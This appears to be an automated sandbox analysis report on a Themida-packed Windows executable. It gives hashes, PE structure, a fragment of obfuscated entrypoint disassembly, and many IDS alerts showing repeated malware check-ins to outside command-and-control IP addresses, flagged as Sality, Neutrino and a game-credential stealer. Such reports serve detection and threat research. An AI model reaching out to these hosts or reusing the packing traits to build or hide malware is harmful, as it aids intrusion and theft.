                                                                                                                                                                                                                                                                                          SHA512:588dba9acc14a5a53502292d6df9b54f5aeb4599f9a3af1585d9e2403fae5470dd58f3fa7c22d16ba04a75bbd27af75c5e3fa1c5f46f2407b5ef17f3a1a7ee97
                                                                                                                                                                                                                                                                                          SSDEEP:49152:T546z5zoX35n+ZO6ZtdpdjivaAmOl9RxBrHTxAXMeQ78M:xz5SYBLpdjiaApl9RxBrHTxAX/Q78M
                                                                                                                                                                                                                                                                                          TLSH:22C533D15D5143D6D99A0EF0AF3EAA25035AA4CA002C7333E66D273D6C1F36E4E37686
                                                                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5.0.T.c.T.c.T.c.K.c.T.cyH.c.T.c.K.c.T.c.,#c.T.c.T.c.T.c.".c.T.c."-c.T.cRich.T.c........................PE..L......W...........

                                                                                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                                                                                          Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Entrypoint:0x7d4058
                                                                                                                                                                                                                                                                                          Entrypoint Section:.boot
                                                                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                          Time Stamp:0x57EEE8CC [Fri Sep 30 22:35:56 2016 UTC]
                                                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                                                                                                                          OS Version Minor:1
                                                                                                                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                                                                                                                          File Version Minor:1
                                                                                                                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                                                                                                                          Subsystem Version Minor:1
                                                                                                                                                                                                                                                                                          Import Hash:56075ba1bea23d7b1dcf68ef072a7c9b

                                                                                                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                                                          add al, 63h
                                                                                                                                                                                                                                                                                          jmp 00007F24B481D0EDh
                                                                                                                                                                                                                                                                                          sbb eax, 56EEF406h
                                                                                                                                                                                                                                                                                          imul ebx, edi, 33440A1Bh
                                                                                                                                                                                                                                                                                          test dl, FFFFFF97h
                                                                                                                                                                                                                                                                                          imul edx, edi, 6C596C96h
                                                                                                                                                                                                                                                                                          test dh, 0000006Eh
                                                                                                                                                                                                                                                                                          xor edi, 00007AC0h
                                                                                                                                                                                                                                                                                          jmp 00007F24B481D0E4h
                                                                                                                                                                                                                                                                                          test ah, cl
                                                                                                                                                                                                                                                                                          mov ah, ch
                                                                                                                                                                                                                                                                                          imul ecx, ecx
                                                                                                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                                                                                                          jmp 00007F24B481D0EEh
                                                                                                                                                                                                                                                                                          imul eax, esi, 9290EA64h
                                                                                                                                                                                                                                                                                          imul eax, esi
                                                                                                                                                                                                                                                                                          movsx esi, di
                                                                                                                                                                                                                                                                                          call 00007F24B481D0E5h
                                                                                                                                                                                                                                                                                          dec esi
                                                                                                                                                                                                                                                                                          lea ebx, dword ptr [53B7EABFh]
                                                                                                                                                                                                                                                                                          add al, 60h
                                                                                                                                                                                                                                                                                          xor ah, bl
                                                                                                                                                                                                                                                                                          mov ebp, 0000DB6Dh
                                                                                                                                                                                                                                                                                          dec esi
                                                                                                                                                                                                                                                                                          xor ebp, 0000F84Fh
                                                                                                                                                                                                                                                                                          or ah, cl
                                                                                                                                                                                                                                                                                          xor ebp, 000049ABh
                                                                                                                                                                                                                                                                                          mov ch, dl
                                                                                                                                                                                                                                                                                          adc al, 11h
                                                                                                                                                                                                                                                                                          dec esi
                                                                                                                                                                                                                                                                                          mov edi, ecx
                                                                                                                                                                                                                                                                                          mov ecx, ebp
                                                                                                                                                                                                                                                                                          cmp ebp, 00001F47h
                                                                                                                                                                                                                                                                                          je 00007F24B481D0E4h
                                                                                                                                                                                                                                                                                          mov esi, ebp
                                                                                                                                                                                                                                                                                          xchg bl, ah
                                                                                                                                                                                                                                                                                          lea edx, dword ptr [ecx]
                                                                                                                                                                                                                                                                                          cmp ecx, 00004596h
                                                                                                                                                                                                                                                                                          jne 00007F24B481D0ECh
                                                                                                                                                                                                                                                                                          lea edi, dword ptr [37A6656Dh]
                                                                                                                                                                                                                                                                                          mov cl, bl
                                                                                                                                                                                                                                                                                          bswap ecx
                                                                                                                                                                                                                                                                                          inc ecx
                                                                                                                                                                                                                                                                                          sub edx, 00000B55h
                                                                                                                                                                                                                                                                                          pop esi
                                                                                                                                                                                                                                                                                          movd mm3, esi
                                                                                                                                                                                                                                                                                          mov edx, ebx
                                                                                                                                                                                                                                                                                          mov esi, 89D99669h
                                                                                                                                                                                                                                                                                          cmp eax, 75C8487Fh
                                                                                                                                                                                                                                                                                          sub edi, 000023ADh
                                                                                                                                                                                                                                                                                          test edi, edx
                                                                                                                                                                                                                                                                                          test edx, 01348F2Dh
                                                                                                                                                                                                                                                                                          bswap edi
                                                                                                                                                                                                                                                                                          and bh, FFFFFF8Fh
                                                                                                                                                                                                                                                                                          movzx ebp, al
                                                                                                                                                                                                                                                                                          mov eax, 00000C4Eh
                                                                                                                                                                                                                                                                                          dec bl
                                                                                                                                                                                                                                                                                          sub eax, 00000146h
                                                                                                                                                                                                                                                                                          sub esi, ecx
                                                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                                                          test bl, dh
                                                                                                                                                                                                                                                                                          pop edx

                                                                                                                                                                                                                                                                                          Rich Headers

                                                                                                                                                                                                                                                                                          Programming Language:
                                                                                                                                                                                                                                                                                          • [LNK] VS98 (6.0) imp/exp build 8168
                                                                                                                                                                                                                                                                                          • [ C ] VS98 (6.0) build 8168
                                                                                                                                                                                                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                          • [LNK] VS2010 build 30319

                                                                                                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1d04d0x6c.imports
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                          Sections

                                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                          0x10000x56c60x284209fc32784ba2cc76eef3a519baaa9777False1.0010673394139336data7.9613934272864615IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                          0x70000x4680x120ab97a7c1a36072dbd3ee6bf475fea3dfFalse1.0381944444444444data7.122004951277352IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                          0x80000x130c40x12e00cf0a03b4145933a91daf14d36a146de5False0.9934809602649006OpenPGP Secret Key7.939872800590452IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                          0x1c0000x1fa0xdd2ab615864d1c229a5d8b6b13d6bdcf16False1.0497737556561086data6.843910827105002IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                          .imports0x1d0000x10000x200b46a658c005761019bbd9ca9b7e26a13False0.212890625data1.5314246902006263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                          .themida0x1e0000x3b60000x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                          .boot0x3d40000x24c0000x24b600bfcc6f65a2cec2d6b022875a1a935392unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                                                                          Imports

                                                                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                                                                          kernel32.dllGetModuleHandleA
                                                                                                                                                                                                                                                                                          SHLWAPI.dllPathAppendW
                                                                                                                                                                                                                                                                                          MSVCRT.dll_exit

                                                                                                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                          2024-10-18T12:41:34.975221+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949707185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:41:34.975221+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949707185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:41:39.935484+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949709190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:41:39.935484+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949709190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:41:39.935484+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949709190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:41:41.407737+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949712185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:41:41.407737+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949712185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:41:49.368405+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949716185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:41:49.368405+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949716185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:41:53.402228+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949719190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:41:53.402228+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949719190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:41:53.402228+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949719190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:41:55.419204+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949721185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:41:55.419204+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949721185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:41:59.701403+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949722190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:41:59.701403+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949722190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:41:59.701403+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949722190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:01.531631+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949723185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:01.531631+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949723185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:06.031031+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949724190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:06.031031+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949724190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:06.031031+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949724190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:07.602990+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949725185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:07.602990+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949725185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:11.645323+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949726190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:11.645323+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949726190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:11.645323+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949726190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:13.239676+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949727185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:13.239676+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949727185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:17.298575+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949728190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:17.298575+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949728190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:17.298575+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949728190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:18.602435+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949729185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:18.602435+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949729185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:22.644756+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949730190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:22.644756+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949730190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:22.644756+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949730190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:24.726632+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949731185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:24.726632+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949731185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:28.989555+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949732190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:28.989555+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949732190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:28.989555+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949732190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:30.465354+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949735185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:30.465354+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949735185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:31.392262+02002816165ETPRO MALWARE Win32/Neutrino checkin 41192.168.2.949733194.5.152.21580TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:34.518806+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949736190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:34.518806+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949736190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:34.518806+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949736190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:36.979019+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949737185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:36.979019+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949737185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:41.055615+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949738190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:41.055615+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949738190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:41.055615+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949738190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:42.705591+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949740185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:42.705591+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949740185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:47.487267+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949741190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:47.487267+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949741190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:47.487267+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949741190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:49.865347+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949759185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:49.865347+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949759185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:54.346733+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949767190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:54.346733+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949767190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:54.346733+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949767190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:56.008076+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949784185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:56.008076+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949784185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:00.351728+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949789190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:00.351728+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949789190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:00.351728+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949789190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:01.755354+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949806185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:01.755354+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949806185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:05.816068+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949814190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:05.816068+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949814190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:05.816068+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949814190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:07.131282+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949835185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:07.131282+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949835185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:11.408873+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949842190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:11.408873+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949842190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:11.408873+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949842190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:12.995616+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949861185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:12.995616+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949861185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:17.555326+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949870190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:17.555326+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949870190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:17.555326+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949870190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:18.923435+02002816165ETPRO MALWARE Win32/Neutrino checkin 41192.168.2.949867194.5.152.21580TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:19.906299+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949889185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:19.906299+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949889185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:23.986856+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949899190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:23.986856+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949899190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:23.986856+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949899190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:25.649318+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949918185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:25.649318+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949918185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:31.472599+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949927190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:31.472599+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949927190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:31.472599+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949927190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:33.227599+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949949185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:33.227599+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949949185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:37.472929+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949955190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:37.472929+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949955190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:37.472929+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949955190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:39.087157+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949977185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:39.087157+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949977185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:43.404850+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949983190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:43.404850+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949983190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:43.404850+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949983190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:45.144872+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950001185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:45.144872+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950001185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:49.504205+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950007190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:49.504205+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.950007190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:49.504205+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950007190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:51.117597+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950027185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:51.117597+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950027185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:55.528705+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950028190.120.227.918080TCP
